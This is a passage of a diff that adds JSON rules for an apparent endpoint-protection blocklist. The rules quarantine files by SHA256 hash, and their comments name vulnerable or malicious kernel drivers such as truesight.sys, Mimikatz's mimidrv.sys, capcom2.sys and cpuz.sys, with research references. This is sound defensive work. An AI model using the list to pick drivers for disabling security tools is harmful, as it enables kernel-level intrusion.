+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493365Z",
+ "creation_date": "2026-03-23T11:45:31.493367Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493372Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f44a9d08cb5f0b9f212269d11899367abf2c6cb8eb3400d1abcacc47c065327e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b35120d1-0066-53d6-b442-70a69d36fabd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150924Z",
+ "creation_date": "2026-03-23T11:45:31.150926Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150931Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bdba77fac50a18117cb65f9b14c9b1ebdf361eb93cc6df75bdb45bd6b0a8e9f5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b35d85a3-22c9-5f84-b2e5-6fc2f03384f9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970428Z",
+ "creation_date": "2026-03-23T11:45:29.970431Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970440Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3b2cd65a4fbdd784a6466e5196bc614c17d1dbaed3fd991d242e3be3e9249da6",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b36029ac-e6e9-53ba-9495-85a7b363205a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490765Z",
+ "creation_date": "2026-03-23T11:45:31.490767Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490772Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9cbc2c3b1d3ff3e8b70534ad2baff4b7266312a9a709f83114c5617bcb10f0d2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b3a88402-ae3a-5203-9618-b68a109f2aa1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487926Z",
+ "creation_date": "2026-03-23T11:45:31.487928Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487933Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "464c021854994a4e3d5461eb3da298d8edab04d16854abff5561ed2f236eb1a3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b3ac668e-cce2-56b3-a97e-c9b3f4834655",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615014Z",
+ "creation_date": "2026-03-23T11:45:29.615016Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615021Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ef86c4e5ee1dbc4f81cd864e8cd2f4a2a85ee4475b9a9ab698a4ae1cc71fbeb0",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b3b1d786-6268-54ae-9c3b-8ff7d994b1fc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812979Z",
+ "creation_date": "2026-03-23T11:45:31.812982Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812991Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5b3cca7fc8463525f0562af040ed47b86acdb24d4ea4380af9bd882d3bcc2cff",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b3b9e38e-0dd9-5805-b7a6-dc1f17e0e4b4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980357Z",
+ "creation_date": "2026-03-23T11:45:29.980359Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980366Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8ed0c00920ce76e832701d45117ed00b12e20588cb6fe8039fbccdfef9841047",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b3b9f43f-beea-52ca-8525-b8a3814963e8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821190Z",
+ "creation_date": "2026-03-23T11:45:30.821193Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821202Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8781589c77df2330a0085866a455d3ef64e4771eb574a211849784fdfa765040",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b3bd14e7-55ba-5eeb-8f6f-d28cdf6ceb33",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608387Z",
+ "creation_date": "2026-03-23T11:45:29.608389Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608394Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c088bd8a06904ec62d40f0f1ae9dc5361472a76238a8458090202e057b983945",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b3be3be9-2da7-50c7-88bc-fda3c070fe2f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818082Z",
+ "creation_date": "2026-03-23T11:45:31.818085Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818093Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3485174d70a7be1357dcca39b49ec9a9e841a269de4dbcb30b58207a48e7519a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b3c2267a-1bf8-5cdc-a822-3d50c219fc72",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472154Z",
+ "creation_date": "2026-03-23T11:45:30.472157Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472166Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3301b49b813427fa37a719988fe6446c6f4468dfe15aa246bec8d397f62f6486",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b3c503cb-fb5b-524b-a386-73dce7bfd7e3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147311Z",
+ "creation_date": "2026-03-23T11:45:31.147314Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147320Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5cb7aafa4b6b04009f8febe155ecef8213cc65a1a09cb84c30cf2e458a43e4e9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b3ce25d9-dd31-565b-90ff-bbc1e1212796",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822220Z",
+ "creation_date": "2026-03-23T11:45:31.822222Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822227Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b4b349c3be07ad3e3c05a965ee83c9a7bcff6218784cec0ac16fc124360bb276",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b3d3a493-8af8-5618-a1ba-11bd27fb8340",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457748Z",
+ "creation_date": "2026-03-23T11:45:30.457751Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457759Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6621fb2e761237d2b09863fd31951789697f119d118d2e5db0e957ab0173f06a",
+ "comment": "Vulnerable Kernel Driver (aka capcom2.sys) [https://www.loldrivers.io/drivers/45c42e32-6261-43c1-bdbd-cab58da729d8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b3d8cffe-da3e-5750-ae0a-e446a05cb598",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145972Z",
+ "creation_date": "2026-03-23T11:45:32.145974Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145980Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f4f0357629e12ff599ad2f0179ac0f4eaec35044b7498037c2d91282dff9e592",
+ "comment": "Vulnerable Kernel Driver (aka TSDRVX64.sys) [https://www.loldrivers.io/drivers/424a387e-735e-49d1-99de-f067dcf1c3e9/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b3e20df8-1e92-583a-8fb2-c6b5d0638b86",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149318Z",
+ "creation_date": "2026-03-23T11:45:31.149320Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149326Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dd7f1a8914e0da98219283e6ce217c74e55329e3dd97725ee275b6e468db799e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b3e59e92-9713-5db9-a2a9-7c853e36e980",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463811Z",
+ "creation_date": "2026-03-23T11:45:30.463814Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463823Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7662187c236003308a7951c2f49c0768636c492f8935292d02f69e59b01d236d",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b3fbec4c-b570-57ac-9935-92715b33819d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978544Z",
+ "creation_date": "2026-03-23T11:45:29.978546Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978552Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e1d3963c55c7ffa96d16e47ec4bbb4e171f828650ce853eb0b83c90ae9c6265a",
+ "comment": "Vulnerable Kernel Driver (aka AMDPowerProfiler.sys) [https://www.loldrivers.io/drivers/9a4fb66e-9084-4b21-9d76-a7afbe330606/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b3ffc1bb-0dce-558a-8d3b-9067ff7f6b10",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488448Z",
+ "creation_date": "2026-03-23T11:45:31.488450Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488456Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e418608e2f1881ab7a46eb0a5eeae8620f01fbb5f9fd7f77cc58f1856a11e217",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b4058d16-20fe-5339-8e67-6fb9c52b49ff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978084Z",
+ "creation_date": "2026-03-23T11:45:29.978086Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978091Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "59177fb7a0b11837368af1cc115f0d011ea19551070bd153795204ae1bd12e52",
+ "comment": "Malicious Kernel Driver (aka ntbios_2.sys) [https://www.loldrivers.io/drivers/33a9c9ae-5ca3-442d-9f0f-2615637c1c57/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b405ebf8-f6b7-57e1-9d26-1d94adfc7b09",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492825Z",
+ "creation_date": "2026-03-23T11:45:31.492828Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492837Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5737c2db59cb518d8044183fcb75b47c7d238c37cb9ba765b05fc4e1ca2b0829",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b41345cf-b173-5227-b281-571a5a7e7307",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827889Z",
+ "creation_date": "2026-03-23T11:45:31.827891Z",
+ "enabled": true,
